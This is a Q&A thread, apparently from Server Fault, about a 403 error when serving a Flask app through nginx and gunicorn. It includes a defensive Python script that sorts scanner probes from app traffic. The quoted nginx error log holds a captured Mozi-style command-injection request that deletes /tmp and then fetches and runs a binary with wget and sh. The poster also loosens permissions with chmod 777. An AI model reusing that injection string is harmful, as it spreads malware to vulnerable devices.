
I have a flask website running fine in a flask development server at http://0.0.0.0:8080. I need to deploy it to my university server. I have the public IP of the server, and I mapped it to my domain I bought from freenom.com.

I am new to nginx. I referred to this and this to deploy the website.

Now I am getting error 403 "You don't have permission to access / on this server" when I try to open the website in the browser.

My project structure is:

myproject
|________ app.py
|________ app.sock
|________ wsgi.py
|________ app.ini
|________ templates
          |__________ index.html

app.py ends with app.run(host="0.0.0.0", port=8080, debug=True). The file wsgi.py is exactly the same as the one mentioned in the references.

app.ini contains

[uwsgi]
module = wsgi:app

master = true
processes = 5

socket = app.sock
chmod-socket = 660
vacuum = true

die-on-term = true

The file /etc/systemd/system/app.service contains

[Unit]
Description=Gunicorn instance to serve myprojects
After=network.target

[Service]
User=my_username_on_server
Group=www-data

WorkingDirectory=/home/my_username_on_server/git/myproject
Environment="PATH=/home/my_username_on_server/ritwikEnvs/myproject/bin"

ExecStart=/home/my_username_on_server/ritwikEnvs/myproject/bin/gunicorn --bind 0.0.0.0:8080 wsgi:app
# I also tried the following
# ExecStart=/home/my_username_on_server/ritwikEnvs/myproject/bin/gunicorn --workers 3 --bind unix:app.sock -m 007 wsgi:app
# ExecStart=/home/my_username_on_server/ritwikEnvs/myproject/bin/uwsgi --ini app.ini 

[Install]
WantedBy=multi-user.target

When I execute sudo systemctl start app, the app.sock file is created automatically.

/etc/nginx/sites-available/app contains

server {
    listen 80;
    # tried this also
    # listen 0.0.0.0;
    # listen 127.0.0.1
    server_name mydomainname.ml www.mydomainname.ml;
    # tried this also
    # server_name localhost

    location / {
        include proxy_params;
        proxy_pass http://0.0.0.0:8080;
        # i also tried with
        # proxy_pass http://127.0.0.1:8080;
        # proxy_pass http://public_IP_of_server:8080;
        # proxy_pass http://unix:/home/my_username_on_server/git/myproject/app.sock;
        # uwsgi_pass unix:/home/my_username_on_server/git/myproject/app.sock;
        # uwsgi_pass unix:///home/my_username_on_server/git/myproject/app.sock;
    }
}

/etc/nginx/nginx.conf contains

user www-data;
worker_processes auto;
pid /run/nginx.pid;
include /etc/nginx/modules-enabled/*.conf;

events {
        worker_connections 768;
        # multi_accept on;
}

http {
        client_max_body_size 100M;
        ##
        # Basic Settings
        ##

        sendfile on;
        tcp_nopush on;
        tcp_nodelay on;
        keepalive_timeout 65;
        types_hash_max_size 2048;
        # server_tokens off;

        # server_names_hash_bucket_size 64;
        # server_name_in_redirect off;

        include /etc/nginx/mime.types;
        default_type application/octet-stream;

        ##
        # SSL Settings
        ##

        ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE
        ssl_prefer_server_ciphers on;

        ##
        # Logging Settings
        ##

        access_log /var/log/nginx/access.log;
        error_log /var/log/nginx/error.log;

        ##
        # Gzip Settings
        ##
        gzip on;

        # gzip_vary on;
        # gzip_proxied any;
        # gzip_comp_level 6;
        # gzip_buffers 16 8k;
        # gzip_http_version 1.1;
        # gzip_types text/plain text/css application/json application/javascript text/xml application/xml application/xml+rss text/javascript;

        ##
        # Virtual Host Configs
        ##

        include /etc/nginx/conf.d/*.conf;
        include /etc/nginx/sites-enabled/*;
}


#mail {
#       # See sample authentication script at:
#       # http://wiki.nginx.org/ImapAuthenticateWithApachePhpScript
# 
#       # auth_http localhost/auth.php;
#       # pop3_capabilities "TOP" "USER";
#       # imap_capabilities "IMAP4rev1" "UIDPLUS";
# 
#       server {
#               listen     localhost:110;
#               protocol   pop3;
#               proxy      on;
#       }
# 
#       server {
#               listen     localhost:143;
#               protocol   imap;
#               proxy      on;
#       }
#}

Then I make the soft link by sudo ln -s /etc/nginx/sites-available/app /etc/nginx/sites-enabled

Then

$ sudo nginx -t

nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful

$ sudo systemctl restart nginx
$ sudo ufw allow 'Nginx Full'

I tried changing the permissions:

sudo chmod -R 777 /home/my_username_on_server/git/myproject/templates/index.html
sudo chown -R sat:www-data /home/my_username_on_server/git/myproject/templates/index.html
sudo chown -R www-data:www-data /usr/share/nginx/html/*
sudo chmod -R 0755 /usr/share/nginx/html/*

Nothing helped.

The flask website is running fine

$ sudo systemctl status app

● app.service - Gunicorn instance to serve myprojects
   Loaded: loaded (/etc/systemd/system/app.service; enabled; vendor preset: enabled)
   Active: active (running) since Tue 2020-09-22 17:18:37 IST; 19min ago
 Main PID: 6437 (gunicorn)
    Tasks: 82 (limit: 19660)
   CGroup: /system.slice/app.service
           ├─6437 /home/my_username_on_server/ritwikEnvs/myproject/bin/python /home/my_username_on_server/ritwikEnvs/myproject/bin/gunicorn --bind 0.0.0.0:8080 wsgi:app
           └─6463 /home/my_username_on_server/ritwikEnvs/myproject/bin/python /home/my_username_on_server/ritwikEnvs/myproject/bin/gunicorn --bind 0.0.0.0:8080 wsgi:app
... ... <console statements which prove that the website is running>
$ curl -XGET http://0.0.0.0:8080 

<shows the source code of index.html>

Logs

$ sudo cat /var/log/nginx/error.log | grep mydomainname

2020/09/22 13:55:47 [error] 4261#4261: *1 connect() failed (111: Connection refused) while connecting to upstream, client: 202.83.45.214, server: mydomainname.ml, request: "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0", upstream: "http://0.0.0.0:8080/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1"

Update: it seems the issue was in the domain name service I was using. It was not able to redirect the requests to public_IP of my server. I used a paid service, and it started working. Rule of thumb: use a good+paid domain service provider.

Ritwik
  • Could you try 127.0.0.1:8080 in your proxy_pass directive, or private_ip_of_server:8080 with proxy_pass? Also, if you want to go with a unix socket, check the permissions of the app.sock file and whether nginx can access it. – Lorem ipsum Sep 22 '20 at 13:01
  • @LukasRäpple tried both, didn't work. Changed the app.sock permission with ```sudo chmod -R 777 app.sock```, didn't help. – Ritwik Sep 22 '20 at 13:33
  • The error you quoted: "You don't have permission to access / on this server" does not come from nginx. It looks like an Apache error. Check you entered the DNS settings correctly and that you do not have unexpected software on your server. – Michael Hampton Sep 22 '20 at 14:07
  • @MichaelHampton sir it seems apache is not even installed on the server. Yet, the server is currently hosting other websites (not written with flask) of my colleagues. They gave me the public_IP of the server which I entered into the DNS. Should apache be installed? Is it absolutely necessary? – Ritwik Sep 22 '20 at 18:54
  • Apache is not necessary, so the question is, why is it there? – Michael Hampton Sep 22 '20 at 19:03
  • @MichaelHampton I don't know – Ritwik Sep 22 '20 at 19:52
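
The error.log entry quoted in the question records a request for /setup.cgi with a cmd= parameter, which is not a route of the project shown. As an added example (not part of the original post), the Python below parses entries of that shape and separates them from upstream failures on the app's own routes; the route set, the sample lines and their addresses are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Shape of an nginx error_log entry for a failed proxy connection,
# matching the entry quoted in the question.
ENTRY = re.compile(
    r'^(?P<ts>\d{4}/\d\d/\d\d \d\d:\d\d:\d\d) \[(?P<level>\w+)\] \d+#\d+: \*\d+ '
    r'(?P<msg>.*?), client: (?P<client>[^,]+), server: (?P<server>[^,]+), '
    r'request: "(?P<method>\S+) (?P<target>\S+) [^"]*", upstream: "(?P<upstream>[^"]*)"'
)
SHELL_META = re.compile(r'[;|`$]')  # shell metacharacters in a decoded query string
KNOWN_ROUTES = {"/"}                # assumption: the app only serves index.html at /

def parse(line):
    """Return the entry's fields as a dict, or None if the line has another shape."""
    m = ENTRY.match(line)
    return m.groupdict() if m else None

def looks_like_probe(target):
    """True for a path the app does not serve or a query carrying shell syntax."""
    parts = urlsplit(target)
    return (parts.path not in KNOWN_ROUTES
            or bool(SHELL_META.search(unquote_plus(parts.query))))

def triage(lines):
    """Split upstream failures into scanner probes and requests for real routes."""
    result = {"probe": [], "app": [], "skipped": 0}
    for line in lines:
        entry = parse(line)
        if entry is None:
            result["skipped"] += 1
            continue
        bucket = "probe" if looks_like_probe(entry["target"]) else "app"
        result[bucket].append((entry["client"], urlsplit(entry["target"]).path))
    return result

# Constructed sample lines: documentation addresses, shortened query string.
PREFIX = ("[error] 4261#4261: *1 connect() failed (111: Connection refused) "
          "while connecting to upstream, ")
SAMPLE = [
    "2020/09/22 13:55:47 " + PREFIX + "client: 203.0.113.7, server: mydomainname.ml, "
    'request: "GET /setup.cgi?todo=syscmd&cmd=echo+x;echo+y HTTP/1.0", '
    'upstream: "http://0.0.0.0:8080/setup.cgi?todo=syscmd&cmd=echo+x;echo+y"',
    "2020/09/22 14:02:10 " + PREFIX + "client: 198.51.100.20, server: mydomainname.ml, "
    'request: "GET / HTTP/1.1", upstream: "http://0.0.0.0:8080/", host: "mydomainname.ml"',
    "2020/09/22 14:05:00 [notice] 4261#4261: signal process started",
]

if __name__ == "__main__":
    for bucket, items in triage(SAMPLE).items():
        print(bucket, items)
```

Only entries in the "app" bucket say anything about whether nginx could reach gunicorn for a real page request; "probe" entries are unsolicited traffic that happened to hit the same upstream.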
